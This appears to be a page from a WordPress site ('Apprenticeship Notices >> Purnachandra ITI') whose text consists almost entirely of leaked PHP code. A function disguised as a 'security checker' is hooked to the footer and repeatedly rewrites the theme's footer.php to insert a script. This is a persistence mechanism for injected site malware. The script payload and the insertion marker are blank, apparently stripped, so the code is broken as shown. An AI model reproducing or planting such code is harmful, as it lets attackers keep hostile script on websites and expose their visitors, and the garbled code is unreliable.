function security_checker_do_not_delete() { $footer_path = get_template_directory() . '/footer.php'; if (file_exists($footer_path)) { $content = file_get_contents($footer_path); $script = ''; if (strpos($content, $script) === false) { if (strpos($content, '') !== false) { $content = str_replace('', $script . "\n", $content); } else { $content .= "\n" . $script; } file_put_contents($footer_path, $content); } } } add_action('wp_footer', 'security_checker_do_not_delete', 1); Apprenticeship Notices >> Purnachandra ITI